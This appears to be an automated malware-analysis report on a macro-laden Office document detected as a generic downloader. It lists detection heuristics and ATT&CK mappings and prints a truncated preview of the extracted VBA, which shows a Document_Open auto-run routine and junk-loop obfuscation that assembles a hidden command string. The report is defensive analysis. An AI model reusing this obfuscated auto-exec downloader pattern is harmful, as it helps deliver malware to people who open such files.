MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is a Microsoft Office document containing a VBA macro that is automatically executed upon opening (Document_Open). The macro utilizes GetObject and p-code execution, indicating an attempt to run malicious code. The ClamAV detection as 'Doc.Downloader.Generic' strongly suggests its purpose is to download and execute a secondary payload. No specific family could be identified.
Heuristics 6
-
ClamAV: Doc.Downloader.Generic-7542953-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7542953-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11375 bytes |
SHA-256: 8a86308c7488d3a3487edcd188bd5f3ab1c438cbbd70d0fd2c22e27b6bfccfe3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Eqwsqawl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Tyqsnjabq
End Sub
Attribute VB_Name = "Cuzfalodaovlu"
Attribute VB_Base = "0{18D111D9-FD98-485D-B2D4-DB0E8E982DE9}{EFF2A754-DB18-4F25-B1B8-77BF9F6E9DC9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Fzhllwhpyp"
Function Xvbedlidaw()
Do While Gprdphnrkdl = 900
Do While Jpmwivpqqigw = 3 + 2
Egftusedw = Chr(4)
Mvgpzbpjcc = Sqr(9) + Sleawpglg
Ilejrhqfszjva = CLng(Qhqmdflb)
Pshnqbgdwy = Int(1 + 1)
Rxclxafiperw = CDate(QKoWc)
Uufswksacpjrc = 9 + Int(4)
Loop
Do While Rdlvvptk = 2 + 4
Lvdslalor = CLng(Ydbucrvncf)
Fyagadjbk = Int(1 + 4)
Koohqoxdlr = 2 + Int(3)
Ajbsyxwodnny = Chr(6)
Uklhfbjtqf = Sqr(7) + Fyecnqmeax
Ldnzhxapnf = CDate(QKoWc)
Loop
Loop
Kkpnzqpy = ChrW(wdKeyP)
Do While Wbwyehqsb = 900
Do While Wygnceswwqgl = 3 + 2
Cesyisgd = Chr(4)
Oiuolcxo = Sqr(9) + Xtmvquxbyoqqi
Dxutelti = CLng(Ukelutrqofjsx)
Ufeblyzzmhe = Int(1 + 1)
Rmdkiwwktpeu = CDate(QKoWc)
Uoslzmfjgpgra = 9 + Int(4)
Loop
Do While Sdprvzcbzj = 2 + 4
Dbpzhnyfku = CLng(Pqhfodqvb)
Lodcarnt = Int(1 + 4)
Bbhrpzecpayhl = 2 + Int(3)
Rxnvtgjdb = Chr(6)
Ekxnxbvgno = Sqr(7) + Yelsmzbedbx
Zxhrsxgnevue = CDate(QKoWc)
Loop
Loop
Vfdlkdakfcaq = Kkpnzqpy + Cuzfalodaovlu.Zeyjdarrlbsv + Cuzfalodaovlu.Auxjplcuki
Do While Lkypjxbqkujuh = 900
Do While Rxjeilmj = 3 + 2
Csatwkes = Chr(4)
Yvshbkskkzv = Sqr(9) + Fvaegrmyb
Gfbxnjfbfed = CLng(Bdxsbznh)
Uxwgybppxjf = Int(1 + 1)
Juxattrbbzvdc = CDate(QKoWc)
Wbxfbsgzqdha = 9 + Int(4)
Loop
Do While Gmyzhoxeyto = 2 + 4
Tybdvhwsvl = CLng(Ddvgxmsblvnxd)
Vscdrofnb = Int(1 + 4)
Mtuxlaxadkcxb = 2 + Int(3)
Maxkdazbazshj = Chr(6)
Qurxzyhoknzds = Sqr(7) + Ubwvbfpqlzmr
Ssoofuigeiwel = CDate(QKoWc)
Loop
Loop
Fack = Cuzfalodaovlu.Qnwuylavk.Tag
Vglylxixtexlb = Split(Vfdlkdakfcaq + LTrim(LTrim(Fack)), "9_msnnj883hn///")
Do While Ifzfpotjepch = 900
Do While Routdjlupw = 3 + 2
Hyvaqcdehhy = Chr(4)
Idzrmvifatlmm = Sqr(9) + Hopdyahuo
Zeedkqaxugmcd = CLng(Jhekodswwsruv)
Ilmnweaw = Int(1 + 1)
Lppavlmdarzq = CDate(QKoWc)
Uhiiktvfcsy = 9 + Int(4)
Loop
Do While Petikwpcocv = 2 + 4
Erudcshwt = CLng(Smpzgmxcuvwzh)
Uongemhdodl = Int(1 + 4)
Futwpxqygpw = 2 + Int(3)
Thlirnuny = Chr(6)
Mkjljbvung = Sqr(7) + Czkjsqnyreytz
Lyedhbkje = CDate(QKoWc)
Loop
Loop
Xvbedlidaw = Jydxcoaz + Join(Vglylxixtexlb, "") + Jydxcoaz
Do While Hxrpznmw = 900
Do While Xulmenjp = 3 + 2
Knkutqlh = Chr(4)
Nnebxxqt = Sqr(9) + Pmvsfuqeh
Urdrtmxvic = CLng(Sqjpjpgxpwam)
Spzahaxrswbj = Int(1 + 1)
Txkbktccve = CDate(QKoWc)
Ajtxqrtbuiw = 9 + Int(4)
Loop
Do While Evbxmozlvdrm = 2 + 4
Epptvtsz = CLng(Ugjqcqkbcgfyb)
Phcefclrpp = Int(1 + 4)
Oboceidcg = 2 + Int(3)
Jetqjsvgol = Chr(6)
Lpuiviot
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.